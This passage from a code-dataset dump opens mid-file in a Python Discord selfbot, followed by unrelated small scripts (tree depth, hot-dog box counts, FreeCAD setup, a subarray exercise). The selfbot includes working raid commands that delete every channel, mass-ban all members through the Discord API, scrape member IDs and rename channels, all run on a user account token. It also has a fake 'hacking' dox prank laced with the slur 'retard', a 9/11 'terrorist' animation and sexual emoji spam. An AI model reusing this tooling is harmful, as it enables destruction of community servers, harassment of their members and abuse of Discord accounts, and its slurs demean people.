'4\\'8\\\"', '4\\'9\\\"', '4\\'10\\\"', '4\\'11\\\"', '5\\'0\\\"', '5\\'1\\\"', '5\\'2\\\"', '5\\'3\\\"',\r\n '5\\'4\\\"', '5\\'5\\\"',\r\n '5\\'6\\\"', '5\\'7\\\"', '5\\'8\\\"', '5\\'9\\\"', '5\\'10\\\"', '5\\'11\\\"', '6\\'0\\\"', '6\\'1\\\"', '6\\'2\\\"', '6\\'3\\\"',\r\n '6\\'4\\\"', '6\\'5\\\"',\r\n '6\\'6\\\"', '6\\'7\\\"', '6\\'8\\\"', '6\\'9\\\"', '6\\'10\\\"', '6\\'11\\\"']\r\n weight = str(random.randrange(60, 300))\r\n hair_color = [\"Black\", \"Brown\", \"Blonde\", \"White\", \"Gray\", \"Red\"]\r\n skin_color = [\"White\", \"Pale\", \"Brown\", \"Black\", \"Light-Skin\"]\r\n religion = [\"Christian\", \"Muslim\", \"Atheist\", \"Hindu\", \"Buddhist\", \"Jewish\"]\r\n sexuality = [\"Straight\", \"Gay\", \"Homo\", \"Bi\", 
\"Bi-Sexual\", \"Lesbian\", \"Pansexual\"]\r\n education = [\"High School\", \"College\", \"Middle School\", \"Elementary School\", \"Pre School\",\r\n \"Retard never went to school LOL\"]\r\n ethnicity = [\"White\", \"African American\", \"Asian\", \"Latino\", \"Latina\", \"American\", \"Mexican\", \"Korean\", \"Chinese\",\r\n \"Arab\", \"Italian\", \"Puerto Rican\", \"Non-Hispanic\", \"Russian\", \"Canadian\", \"European\", \"Indian\"]\r\n occupation = [\"Retard has no job LOL\", \"Certified discord retard\", \"Janitor\", \"Police Officer\", \"Teacher\",\r\n \"Cashier\", \"Clerk\", \"Waiter\", \"Waitress\", \"Grocery Bagger\", \"Retailer\", \"Sales-Person\", \"Artist\",\r\n \"Singer\", \"Rapper\", \"Trapper\", \"Discord Thug\", \"Gangster\", \"Discord Packer\", \"Mechanic\", \"Carpenter\",\r\n \"Electrician\", \"Lawyer\", \"Doctor\", \"Programmer\", \"Software Engineer\", \"Scientist\"]\r\n salary = [\"Retard makes no money LOL\", \"$\" + str(random.randrange(0, 1000)), '<$50,000', '<$75,000', \"$100,000\",\r\n \"$125,000\", \"$150,000\", \"$175,000\",\r\n \"$200,000+\"]\r\n location = [\"Retard lives in his mom's basement LOL\", \"America\", \"United States\", \"Europe\", \"Poland\", \"Mexico\",\r\n \"Russia\", \"Pakistan\", \"India\",\r\n \"Some random third world country\", \"Canada\", \"Alabama\", \"Alaska\", \"Arizona\", \"Arkansas\", \"California\",\r\n \"Colorado\", \"Connecticut\", \"Delaware\", \"Florida\", \"Georgia\", \"Hawaii\", \"Idaho\", \"Illinois\", \"Indiana\",\r\n \"Iowa\", \"Kansas\", \"Kentucky\", \"Louisiana\", \"Maine\", \"Maryland\", \"Massachusetts\", \"Michigan\",\r\n \"Minnesota\", \"Mississippi\", \"Missouri\", \"Montana\", \"Nebraska\", \"Nevada\", \"New Hampshire\", \"New Jersey\",\r\n \"New Mexico\", \"New York\", \"North Carolina\", \"North Dakota\", \"Ohio\", \"Oklahoma\", \"Oregon\",\r\n \"Pennsylvania\", \"Rhode Island\", \"South Carolina\", \"South Dakota\", \"Tennessee\", \"Texas\", \"Utah\",\r\n \"Vermont\", \"Virginia\", \"Washington\", \"West Virginia\", \"Wisconsin\", \"Wyoming\"]\r\n email = [\"@gmail.com\", \"@yahoo.com\", \"@hotmail.com\", \"@outlook.com\", \"@protonmail.com\", \"@disposablemail.com\",\r\n \"@aol.com\", \"@edu.com\", \"@icloud.com\", \"@gmx.net\", \"@yandex.com\"]\r\n dob = f'{random.randrange(1, 13)}/{random.randrange(1, 32)}/{random.randrange(1950, 2021)}'\r\n name = ['James Smith', \"Michael Smith\", \"Robert Smith\", \"Maria Garcia\", \"David Smith\", \"Maria Rodriguez\",\r\n \"Mary Smith\", \"Maria Hernandez\", \"Maria Martinez\", \"James Johnson\", \"Catherine Smoaks\", \"Cindi Emerick\",\r\n \"Trudie Peasley\", \"Josie Dowler\", \"Jefferey Amon\", \"Kyung Kernan\", \"Lola Barreiro\",\r\n \"Barabara Nuss\", \"Lien Barmore\", \"Donnell Kuhlmann\", \"Geoffrey Torre\", \"Allan Craft\",\r\n \"Elvira Lucien\", \"Jeanelle Orem\", \"Shantelle Lige\", \"Chassidy Reinhardt\", \"Adam Delange\",\r\n \"Anabel Rini\", \"Delbert Kruse\", \"Celeste Baumeister\", \"Jon Flanary\", \"Danette Uhler\", \"Xochitl Parton\",\r\n \"Derek Hetrick\", \"Chasity Hedge\", \"Antonia Gonsoulin\", \"Tod Kinkead\", \"Chastity Lazar\", \"Jazmin Aumick\",\r\n \"Janet Slusser\", \"Junita Cagle\", \"Stepanie Blandford\", \"Lang Schaff\", \"Kaila Bier\", \"Ezra Battey\",\r\n \"Bart Maddux\", \"Shiloh Raulston\", \"Carrie Kimber\", \"Zack Polite\", \"Marni Larson\", \"Justa Spear\"]\r\n phone = f'({random.randrange(0, 10)}{random.randrange(0, 10)}{random.randrange(0, 10)})-{random.randrange(0, 10)}{random.randrange(0, 10)}{random.randrange(0, 
10)}-{random.randrange(0, 10)}{random.randrange(0, 10)}{random.randrange(0, 10)}{random.randrange(0, 10)}'\r\n if user is None:\r\n user = ctx.author\r\n password = ['password', '123', 'mypasswordispassword', user.name + \"iscool123\", user.name + \"isdaddy\",\r\n \"daddy\" + user.name, \"ilovediscord\", \"i<3discord\", \"furryporn456\", \"secret\", \"123456789\", \"apple49\",\r\n \"redskins32\", \"princess\", \"dragon\", \"password1\", \"1q2w3e4r\", \"ilovefurries\"]\r\n message = await ctx.send(f\"`Hacking {user}...\\n`\")\r\n await asyncio.sleep(1)\r\n await message.edit(content=f\"`Hacking {user}...\\nHacking into the mainframe...\\n`\")\r\n await asyncio.sleep(1)\r\n await message.edit(content=f\"`Hacking {user}...\\nHacking into the mainframe...\\nCaching data...`\")\r\n await asyncio.sleep(1)\r\n await message.edit(\r\n content=f\"`Hacking {user}...\\nHacking into the mainframe...\\nCaching data...\\nCracking SSN information...\\n`\")\r\n await asyncio.sleep(1)\r\n await message.edit(\r\n content=f\"`Hacking {user}...\\nHacking into the mainframe...\\nCaching data...\\nCracking SSN information...\\nBruteforcing love life details...`\")\r\n await asyncio.sleep(1)\r\n await message.edit(\r\n content=f\"`Hacking {user}...\\nHacking into the mainframe...\\nCaching data...\\nCracking SSN information...\\nBruteforcing love life details...\\nFinalizing life-span dox details\\n`\")\r\n await asyncio.sleep(1)\r\n await message.edit(\r\n content=f\"```Successfully hacked {user}\\nName: {random.choice(name)}\\nGender: {random.choice(gender)}\\nAge: {age}\\nHeight: {random.choice(height)}\\nWeight: {weight}\\nHair Color: {random.choice(hair_color)}\\nSkin Color: {random.choice(skin_color)}\\nDOB: {dob}\\nLocation: {random.choice(location)}\\nPhone: {phone}\\nE-Mail: {user.name + random.choice(email)}\\nPasswords: {random.choices(password, k=3)}\\nOccupation: {random.choice(occupation)}\\nAnnual Salary: {random.choice(salary)}\\nEthnicity: {random.choice(ethnicity)}\\nReligion: {random.choice(religion)}\\nSexuality: {random.choice(sexuality)}\\nEducation: {random.choice(education)}```\")\r\n else:\r\n password = ['password', '123', 'mypasswordispassword', user.name + \"iscool123\", user.name + \"isdaddy\",\r\n \"daddy\" + user.name, \"ilovediscord\", \"i<3discord\", \"furryporn456\", \"secret\", \"123456789\", \"apple49\",\r\n \"redskins32\", \"princess\", \"dragon\", \"password1\", \"1q2w3e4r\", \"ilovefurries\"]\r\n message = await ctx.send(f\"`Hacking {user}...\\n`\")\r\n await asyncio.sleep(1)\r\n await message.edit(content=f\"`Hacking {user}...\\nHacking into the mainframe...\\n`\")\r\n await asyncio.sleep(1)\r\n await message.edit(content=f\"`Hacking {user}...\\nHacking into the mainframe...\\nCaching data...`\")\r\n await asyncio.sleep(1)\r\n await message.edit(\r\n content=f\"`Hacking {user}...\\nHacking into the mainframe...\\nCaching data...\\nCracking SSN information...\\n`\")\r\n await asyncio.sleep(1)\r\n await message.edit(\r\n content=f\"`Hacking {user}...\\nHacking into the mainframe...\\nCaching data...\\nCracking SSN information...\\nBruteforcing love life details...`\")\r\n await asyncio.sleep(1)\r\n await message.edit(\r\n content=f\"`Hacking {user}...\\nHacking into the mainframe...\\nCaching data...\\nCracking SSN information...\\nBruteforcing love life details...\\nFinalizing life-span dox details\\n`\")\r\n await asyncio.sleep(1)\r\n await message.edit(\r\n content=f\"```Successfully hacked {user}\\nName: {random.choice(name)}\\nGender: {random.choice(gender)}\\nAge: 
{age}\\nHeight: {random.choice(height)}\\nWeight: {weight}\\nHair Color: {random.choice(hair_color)}\\nSkin Color: {random.choice(skin_color)}\\nDOB: {dob}\\nLocation: {random.choice(location)}\\nPhone: {phone}\\nE-Mail: {user.name + random.choice(email)}\\nPasswords: {random.choices(password, k=3)}\\nOccupation: {random.choice(occupation)}\\nAnnual Salary: {random.choice(salary)}\\nEthnicity: {random.choice(ethnicity)}\\nReligion: {random.choice(religion)}\\nSexuality: {random.choice(sexuality)}\\nEducation: {random.choice(education)}```\")\r\n\r\n\r\n@tokyo.command()\r\nasync def purge(ctx, amount: int=None):\r\n await ctx.message.delete()\r\n if amount is None:\r\n await ctx.send(f'[ERROR]: Invalid input! Command: {tokyo.command_prefix}purge ')\r\n return\r\n async for message in ctx.message.channel.history(limit=amount).filter(lambda m: m.author == tokyo.user).map(\r\n lambda m: m):\r\n try:\r\n await message.delete()\r\n except:\r\n pass\r\n@tokyo.command(aliases=[\"copyguild\", \"copyserver\"])\r\nasync def copy(ctx):\r\n await ctx.message.delete()\r\n await tokyo.create_guild(f'backup-{ctx.guild.name}')\r\n await asyncio.sleep(4)\r\n for g in tokyo.guilds:\r\n if f'backup-{ctx.guild.name}' in g.name:\r\n for c in g.channels:\r\n await c.delete()\r\n for cate in ctx.guild.categories:\r\n x = await g.create_category(f\"{cate.name}\")\r\n for chann in cate.channels:\r\n if isinstance(chann, discord.VoiceChannel):\r\n await x.create_voice_channel(f\"{chann}\")\r\n if isinstance(chann, discord.TextChannel):\r\n await x.create_text_channel(f\"{chann}\")\r\n try:\r\n await g.edit(icon=ctx.guild.icon_url)\r\n except Exception as e:\r\n await ctx.send(f'[ERROR]: {e}')\r\n\r\n@tokyo.command(aliases=[\"jerkoff\", \"ejaculate\", \"orgasm\"])\r\nasync def cum(ctx):\r\n await ctx.message.delete()\r\n message = await ctx.send('''\r\n :ok_hand: :smile:\r\n :eggplant: :zzz: :necktie: :eggplant: \r\n :oil: :nose:\r\n :zap: 8=:punch:=D \r\n :trumpet: :eggplant:''')\r\n await asyncio.sleep(0.5)\r\n await message.edit(content='''\r\n :ok_hand: :smiley:\r\n :eggplant: :zzz: :necktie: :eggplant: \r\n :oil: :nose:\r\n :zap: 8==:punch:D \r\n :trumpet: :eggplant: \r\n ''')\r\n await asyncio.sleep(0.5)\r\n await message.edit(content='''\r\n :ok_hand: :grimacing:\r\n :eggplant: :zzz: :necktie: :eggplant: \r\n :oil: :nose:\r\n :zap: 8=:punch:=D \r\n :trumpet: :eggplant: \r\n ''')\r\n await asyncio.sleep(0.5)\r\n await message.edit(content='''\r\n :ok_hand: :persevere:\r\n :eggplant: :zzz: :necktie: :eggplant: \r\n :oil: :nose:\r\n :zap: 8==:punch:D \r\n :trumpet: :eggplant: \r\n ''')\r\n await asyncio.sleep(0.5)\r\n await message.edit(content='''\r\n :ok_hand: :confounded:\r\n :eggplant: :zzz: :necktie: :eggplant: \r\n :oil: :nose:\r\n :zap: 8=:punch:=D \r\n :trumpet: :eggplant: \r\n ''')\r\n await asyncio.sleep(0.5)\r\n await message.edit(content='''\r\n :ok_hand: :tired_face:\r\n :eggplant: :zzz: :necktie: :eggplant: \r\n :oil: :nose:\r\n :zap: 8==:punch:D \r\n :trumpet: :eggplant: \r\n ''')\r\n await asyncio.sleep(0.5)\r\n await message.edit(content='''\r\n :ok_hand: :weary:\r\n :eggplant: :zzz: :necktie: :eggplant: \r\n :oil: :nose:\r\n :zap: 8=:punch:= D:sweat_drops:\r\n :trumpet: :eggplant: \r\n ''')\r\n await asyncio.sleep(0.5)\r\n await message.edit(content='''\r\n :ok_hand: :dizzy_face:\r\n :eggplant: :zzz: :necktie: :eggplant: \r\n :oil: :nose:\r\n :zap: 8==:punch:D :sweat_drops:\r\n :trumpet: :eggplant: :sweat_drops:\r\n ''')\r\n await asyncio.sleep(0.5)\r\n await message.edit(content='''\r\n 
:ok_hand: :drooling_face:\r\n :eggplant: :zzz: :necktie: :eggplant: \r\n :oil: :nose:\r\n :zap: 8==:punch:D :sweat_drops:\r\n :trumpet: :eggplant: :sweat_drops:\r\n ''')\r\n\r\n\r\n\r\n@tokyo.command(aliases=[\"9/11\", \"911\", \"terrorist\"])\r\nasync def nine_eleven(ctx):\r\n await ctx.message.delete()\r\n invis = \"\" # char(173)\r\n message = await ctx.send(f'''\r\n{invis}:man_beard::airplane: :office: \r\n''')\r\n await asyncio.sleep(0.5)\r\n await message.edit(content=f'''\r\n{invis} :man_beard::airplane: :office: \r\n''')\r\n await asyncio.sleep(0.5)\r\n await message.edit(content=f'''\r\n{invis} :man_beard::airplane: :office: \r\n''')\r\n await asyncio.sleep(0.5)\r\n await message.edit(content=f'''\r\n{invis} :man_beard::airplane: :office: \r\n''')\r\n await asyncio.sleep(0.5)\r\n await message.edit(content=f'''\r\n{invis} :man_beard::airplane::office: \r\n''')\r\n await asyncio.sleep(0.5)\r\n await message.edit(content='''\r\n :boom::boom::boom: \r\n ''')\r\n\r\n\r\n@tokyo.command(aliases=[\"distort\"])\r\nasync def magik(ctx, user: discord.Member=None):\r\n await ctx.message.delete()\r\n endpoint = \"https://nekobot.xyz/api/imagegen?type=magik&intensity=3&image=\"\r\n if user is None:\r\n avatar = str(ctx.author.avatar_url_as(format=\"png\"))\r\n endpoint += avatar\r\n r = requests.get(endpoint)\r\n res = r.json()\r\n try:\r\n async with aiohttp.ClientSession() as session:\r\n async with session.get(str(res['message'])) as resp:\r\n image = await resp.read()\r\n with io.BytesIO(image) as file:\r\n await ctx.send(file=discord.File(file, f\"astraa_magik.png\"))\r\n except:\r\n await ctx.send(res['message'])\r\n else:\r\n avatar = str(user.avatar_url_as(format=\"png\"))\r\n endpoint += avatar\r\n r = requests.get(endpoint)\r\n res = r.json()\r\n try:\r\n async with aiohttp.ClientSession() as session:\r\n async with session.get(str(res['message'])) as resp:\r\n image = await resp.read()\r\n with io.BytesIO(image) as file:\r\n await ctx.send(file=discord.File(file, f\"astraa_magik.png\"))\r\n except:\r\n await ctx.send(res['message'])\r\n\r\n\r\n@tokyo.command(aliases=[\"game\"])\r\nasync def play(ctx, *, message=None):\r\n await ctx.message.delete()\r\n if message is None:\r\n await ctx.send(f'[ERROR]: Invalid input! Command: {tokyo.command_prefix}playing ')\r\n return\r\n game = discord.Game(name=message)\r\n await tokyo.change_presence(activity=game)\r\n\r\n\r\n\r\n@tokyo.command(aliases=[\"stopstreaming\", \"stopstatus\", \"stoplistening\", \"stopplaying\", \"stopwatching\"])\r\nasync def stop(ctx):\r\n await ctx.message.delete()\r\n await tokyo.change_presence(activity=None, status=discord.Status.dnd)\r\n\r\n@tokyo.command()\r\nasync def scrape(ctx):\r\n await ctx.message.delete()\r\n mem = ctx.guild.members\r\n for member in mem:\r\n try:\r\n print(\"Scraped members.\")\r\n mfil = open(\"TOKYOSB/members.txt\",\"a\")\r\n\r\n mfil.write(str(member.id) + \"\\n\")\r\n mfil.close()\r\n\r\n except Exception as e:\r\n print(\"error\",e)\r\n\r\n@tokyo.command(aliases=['dc'])\r\nasync def deletechannels(ctx):\r\n await ctx.message.delete()\r\n print(f\"{Fore.RED}Deleting Channels . . 
.\")\r\n for channel in ctx.guild.channels:\r\n await channel.delete()\r\n print(f\"{Fore.RED} Channels Deleted\")\r\n\r\n\r\n@tokyo.command()\r\nasync def massban(ctx, guild):\r\n guild = guild\r\n await tokyo.wait_until_ready()\r\n guildOBJ = tokyo.get_guild(int(guild))\r\n members = await guildOBJ.chunk()\r\n try:\r\n os.remove('TOKYOSB/members.txt')\r\n except:\r\n pass\r\n\r\n membercount = 0\r\n with open('TOKYOSB/members.txt', 'a') as (m):\r\n for member in members:\r\n m.write(str(member.id) + '\\n')\r\n membercount += 1\r\n\r\n await ctx.send('TOKYO | MASS BAN INITIATED\\nRemoving Members in progress......')\r\n m.close()\r\n guild = guild\r\n print()\r\n members = open('TOKYOSB/members.txt')\r\n for member in members:\r\n while True:\r\n r = requests.put(f\"https://discord.com/api/v8/guilds/{guild}/bans/{member}\", headers=headers)\r\n if 'retry_after' in r.text:\r\n time.sleep(r.json()['retry_after'])\r\n else:\r\n if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:\r\n print(f\"Banned{member.strip()}\")\r\n break\r\n else:\r\n break\r\n\r\n members.close()\r\n\r\n@tokyo.command(aliases=[\"rc\"])\r\nasync def renamechannels(ctx, *, name):\r\n \r\n for channel in ctx.guild.channels:\r\n await channel.edit(name=name)\r\n\r\n\r\n\r\nif token_type == \"user\":\r\n tokyo.run(token, bot=False)\r\nelif token_type == \"bot\":\r\n tokyo.run(token)\r\n\r\n\r\ntokyo.run(token, bot = False)\r\n","repo_name":"s3ng0n/TokyoSelfbot","sub_path":"selfbot.py","file_name":"selfbot.py","file_ext":"py","file_size_in_byte":22341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7260653741","text":"import sys\nclass Node():\n def __init__(self, v):\n self.value = v\n self.left = None\n self.right = None\n self.visit = False\n\ndef isLeaf(node):\n return not node.left and not node.right\n\ndef traverse(node, h, mh):\n h = h + 1\n if isLeaf(node):\n node.visit = True\n return min(mh, h)\n\n if node.left and not node.left.visit:\n mh = min(traverse(node.left, h, mh), mh)\n if node.right and not node.right.visit:\n mh = min(traverse(node.right, h, mh), mh)\n node.visit = True\n return mh\n\n\ndef minDepth(root):\n if isLeaf(root):\n return 1\n return traverse(root, 0, sys.maxsize)\n\nif __name__ == '__main__':\n # Driver Program\n root = Node(10)\n root.left = Node(5)\n root.left.left = Node(4)\n root.left.left.left = Node(1)\n root.right = Node(3)\n # root.left.left = Node(4)\n # root.left.right = Node(5)\n print(minDepth(root))","repo_name":"demyank88/datastructureAlgorithm","sub_path":"binarySearchTree/FindMinimunDepthOfABinaryTree/trial.py","file_name":"trial.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42232542054","text":"# ile opakowan bulek i parowek na hot-dog\n# dla podanej ilosci osob\n\n#lewis_lu 18/06/2019\n\n\nBOX_PAR = 10\nBOX_BUL = 8\n\nosoby = int(input('Podaj ilosc osob: '))\n\nbox_p = osoby % BOX_PAR\nbox_p1 = osoby // BOX_PAR\nbox_p2 = box_p1 + 1\next_p = BOX_PAR - box_p\n\nbox_b = osoby % BOX_BUL\nbox_b1 = osoby // BOX_BUL\nbox_b2 = box_b1 + 1\next_b = BOX_BUL - box_b\n\n\nif box_p > 0:\n\tprint('Potrzebujesz', box_p2,'opakowan parowek' )\nelse:\n\tprint('Potrzebujesz', box_p1, 'opakowan parowek')\n\t\nif box_b > 0:\n\tprint('Potrzebujesz', box_b2,'opakowan bulek' )\nelse:\n\tprint('Potrzebujesz', box_b1, 'opakowan bulek')\n\t\nif box_p > 0:\n\tprint('Pozostalo jeszcze', ext_p, 'parowki(-ek)')\nif 
box_b > 0:\n\tprint('Pozostalo jeszcze', ext_b, 'bulki(-ek)')\n","repo_name":"lewislu77/Starting_with_Python_4thEd.","sub_path":"chapter 3/ex.8_p.3.py","file_name":"ex.8_p.3.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5099483468","text":"def add_snap_pythonpath():\n import os\n import sys\n\n pythonpath = os.environ.get(\"SNAP_PYTHONPATH\")\n if pythonpath:\n print(f\"Adding snap-specific PYTHONPATH to sys.path: {pythonpath}\")\n os.environ[\"PYTHONPATH\"] = pythonpath\n for path in pythonpath.split(\":\"):\n sys.path.insert(0, path)\n\ndef configure_mod_raytracing():\n import FreeCAD\n param = FreeCAD.ParamGet(\"User parameter:BaseApp/Preferences/Mod/Raytracing\")\n if not param.GetString(\"PovrayExecutable\", \"\"):\n param.SetString(\"PovrayExecutable\", \"/snap/freecad/current/usr/bin/povray\")\n\ndef configure_mod_mesh():\n import FreeCAD\n param = FreeCAD.ParamGet(\"User parameter:BaseApp/Preferences/Mod/Mesh/Meshing\")\n if not param.GetString(\"gmshExe\", \"\"):\n param.SetString(\"gmshExe\", \"/snap/freecad/current/usr/bin/gmsh\")\n\ndef fix_theme():\n import FreeCAD\n param = FreeCAD.ParamGet(\"User parameter:BaseApp/Preferences/Bitmaps/Theme\")\n if param.GetBool(\"ThemeSearchPaths\", False) != param.GetBool(\"ThemeSearchPaths\", True):\n param.SetBool(\"ThemeSearchPaths\", False)\n\nadd_snap_pythonpath()\nconfigure_mod_raytracing()\nconfigure_mod_mesh()\nfix_theme()\n","repo_name":"realthunder/FreeCADMakeImage","sub_path":"snap/local/snap-setup-mod/Init.py","file_name":"Init.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"78"} +{"seq_id":"3031193646","text":"#!/usr/bin/env python\n# coding: utf-8\n# libraries\nimport numpy as np\n# input data\nx = int(input()) # number of input data sets\nfor i in range(x):\n N,K = map(int, input().split())\n sectors = np.array(list(map(int, input().split())))\n sums = []\n sectors= np.concatenate((sectors[K+1:],sectors[0:K]))\n length=len(sectors)\n for i in range(length):\n for j in range(length):\n if i==j:\n sums.append(sectors[i])\n else:\n sums.append(sectors[i:j+1].sum())\n print(max(sums))\n \n#8 2\n#2 3 4 5 -30 6 -1 2\n \n#6 -1\n#1 -3 2 -2 3 4","repo_name":"masanya99/school-applies","sub_path":"MADE/TEST.py","file_name":"TEST.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21214993638","text":"from os.path import join\nfrom PyQt4 import QtGui\nfrom PyQt4.QtCore import *\n\nimport gettext\n__trans = gettext.translation('yali4', fallback=True)\n_ = __trans.ugettext\n\nimport yali4.sysutils\nfrom yali4.gui.Ui.main import Ui_YaliMain\nimport yali4.gui.context as ctx\n\n# Aspect oriented huh ;)\nfrom pyaspects.weaver import *\nfrom yali4.gui.aspects import *\n\n# Release Notes\nimport GUIRelNotes\n\n##\n# Widget for YaliWindow (you can call it MainWindow too ;).\nclass Widget(Ui_YaliMain):\n def __init__(self):\n self.ui = QtGui.QWidget()\n self.setupUi(self.ui)\n self.screenData = None\n # shortcut to open debug window\n self.debugShortCut = QtGui.QShortcut(QtGui.QKeySequence(Qt.Key_F2),self.ui)\n self.ui.setAttribute(Qt.WA_OpaquePaintEvent)\n # move one step at a time\n self.moveInc = 1\n\n # Dont need help as default\n self.slotToggleHelp()\n\n # Main Slots\n QObject.connect(self.debugShortCut, SIGNAL(\"activated()\"), 
self.toggleDebug)\n QObject.connect(self.buttonNext, SIGNAL(\"clicked()\"), self.slotNext)\n QObject.connect(self.buttonBack, SIGNAL(\"clicked()\"), self.slotBack)\n QObject.connect(self.toggleHelp, SIGNAL(\"clicked()\"), self.slotToggleHelp)\n QObject.connect(self.releaseNotes, SIGNAL(\"clicked()\"), self.showReleaseNotes)\n\n # show/hide help text\n def slotToggleHelp(self):\n if self.helpContent.isVisible():\n self.helpContent.hide()\n else:\n self.helpContent.show()\n\n # show/hide debug window\n def toggleDebug(self):\n if ctx.debugger.isVisible():\n ctx.debugger.hideWindow()\n else:\n ctx.debugger.showWindow()\n\n # returns the id of current stack\n def getCur(self, d):\n new = self.mainStack.currentIndex() + d\n total = self.mainStack.count()\n if new < 0: new = 0\n if new > total: new = total\n return new\n\n # move to id numbered step\n def setCurrent(self, id=None):\n if id:\n self.stackMove(id)\n\n # execute next step\n def slotNext(self, dryRun=False):\n if not dryRun:\n _w = self.mainStack.currentWidget()\n _w.execute()\n self.stackMove(self.getCur(self.moveInc))\n self.moveInc = 1\n\n # execute previous step\n def slotBack(self):\n _w = self.mainStack.currentWidget()\n _w.backCheck()\n self.stackMove(self.getCur(self.moveInc * -1))\n self.moveInc = 1\n\n # move to id numbered stack\n def stackMove(self, id):\n self.mainStack.setCurrentIndex(id)\n _w = self.mainStack.currentWidget()\n self.screenName.setText(_w.title)\n self.screenDescription.setText(_w.desc)\n self.screenIcon.setPixmap(QtGui.QPixmap(\":/gui/pics/%s.png\" % (_w.icon or \"pardus\")))\n self.helpContent.setText(_w.help)\n # shown functions contain necessary instructions before\n # showing a stack ( updating gui, disabling some buttons etc. )\n _w.shown()\n\n # create all widgets and add inside stack\n # see runner.py/_all_screens for the list\n def createWidgets(self, screens=[]):\n if not self.screenData:\n self.screenData = screens\n self.mainStack.removeWidget(self.page)\n for screen in screens:\n _scr = screen.Widget()\n\n if ctx.options.debug == True or yali4.sysutils.checkYaliParams(param=\"debug\"):\n # debug all screens.\n weave_all_object_methods(ctx.debugger.aspect, _scr)\n\n # enable navigation buttons before shown\n weave_object_method(enableNavButtonsAspect, _scr, \"shown\")\n # disable navigation buttons before the execute.\n weave_object_method(disableNavButtonsAspect, _scr, \"execute\")\n\n self.mainStack.addWidget(_scr)\n\n weave_all_object_methods(ctx.debugger.aspect, self)\n self.stackMove(0)\n\n # Enable/Disable buttons\n def disableNext(self):\n self.buttonNext.setEnabled(False)\n\n def disableBack(self):\n self.buttonBack.setEnabled(False)\n\n def enableNext(self):\n self.buttonNext.setEnabled(True)\n\n def enableBack(self):\n self.buttonBack.setEnabled(True)\n\n def isNextEnabled(self):\n return self.buttonNext.isEnabled()\n\n def isBackEnabled(self):\n return self.buttonBack.isEnabled()\n\n # processEvents\n def processEvents(self):\n QObject.emit(self.ui,SIGNAL(\"signalProcessEvents\"))\n\n def showReleaseNotes(self):\n # make a release notes dialog\n r = GUIRelNotes.Widget(self.ui)\n d = Dialog(_('Release Notes'), r, self)\n d.resize(500,400)\n d.exec_()\n\n","repo_name":"pisilinux/uludag","sub_path":"branches/yali/raid/yali4/gui/YaliWindow.py","file_name":"YaliWindow.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"2567542493","text":"from django.contrib.auth import views as 
auth_views\nfrom django.urls import path\nfrom rest_framework.routers import DefaultRouter\nfrom .views import (UserAPIView,\n CreateTokenView,\n AgentAPIView,\n AddWishlistView,\n AdsInUserWishListView,\n AdsInUserWishListDetailView, AgentInfoViewSet)\n\nrouter = DefaultRouter()\n# router.register(r'users', CustomUserViewSet, basename='user')\nrouter.register(r'agents', AgentInfoViewSet, basename='agents')\n\nurlpatterns = [\n path('register/', UserAPIView.as_view(), name='create-user'),\n path('become-agent/', AgentAPIView.as_view(), name='create-agent'),\n path('login/', CreateTokenView.as_view(), name='token'),\n path('add-wishlist//', AddWishlistView.as_view(), name='add-wishlist'),\n path('wishlist/', AdsInUserWishListView.as_view(), name='user-wishlist'),\n path('ads-details//', AdsInUserWishListDetailView.as_view(), name='ads-detail')\n\n]\n# urlpatterns += router.urls\n","repo_name":"Kylych-dev/izde_kg","sub_path":"app/oauth/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19417024604","text":"import pytest\n\n\n@pytest.mark.parametrize(\n \"rgb1,rgb2,output\",\n [\n ((0, 0, 0), (0, 0, 0), 0),\n ((0, 0, 0), (0, 0, 1), 0.6322079321995702),\n ((10, 20, 30), (110, 120, 130), 43.07089640618708),\n ],\n)\ndef test_color_diff(rgb1, rgb2, output):\n from jcvi.utils.webcolors import color_diff\n\n assert color_diff(rgb1, rgb2) == pytest.approx(output)\n\n\n@pytest.mark.parametrize(\n \"input,output\",\n [((171, 222, 230), \"powderblue\"), ((254, 225, 232), \"lavenderblush\")],\n)\ndef test_closest_color(input, output):\n from jcvi.utils.webcolors import closest_color\n\n assert closest_color(input) == output\n","repo_name":"tanghaibao/jcvi","sub_path":"tests/utils/test_webcolors.py","file_name":"test_webcolors.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":634,"dataset":"github-code","pt":"78"} +{"seq_id":"10811329868","text":"def calculateFishPop(days, population):\n for day in range(int(days)):\n temp = population.copy()\n population[8] = temp[0]\n population[7] = temp[8]\n population[6] = temp[7] + temp[0]\n population[5] = temp[6]\n population[4] = temp[5]\n population[3] = temp[4]\n population[2] = temp[3]\n population[1] = temp[2]\n population[0] = temp[1]\n\n totalPopulation = 0\n for pop in population:\n totalPopulation += pop \n return totalPopulation \n\ndef createStartPop(input):\n population = [0 for x in range(9)]\n\n for fish in input[0].split(','):\n population[int(fish)] += 1\n return population\n\ninput = open( \"/Users/dennisgauss/Documents/Coding/AdventOfCode2021/input_ex6.txt\" ,\"r\").read().split('\\n')\nprint( calculateFishPop(256,createStartPop(input)) )","repo_name":"chanohara/AdventOfCode2021","sub_path":"exercise6.py","file_name":"exercise6.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33571707698","text":"import json\nimport os\nimport re\n\n\ndef get_data(file_path):\n text = []\n _id = os.path.splitext(os.path.basename(file_path))[0]\n print(_id)\n with open(file_path, 'r', encoding='utf8') as fp:\n for line in fp:\n line = re.sub(r'[\\uf070\\uf0d8\\uf0fc]', '', 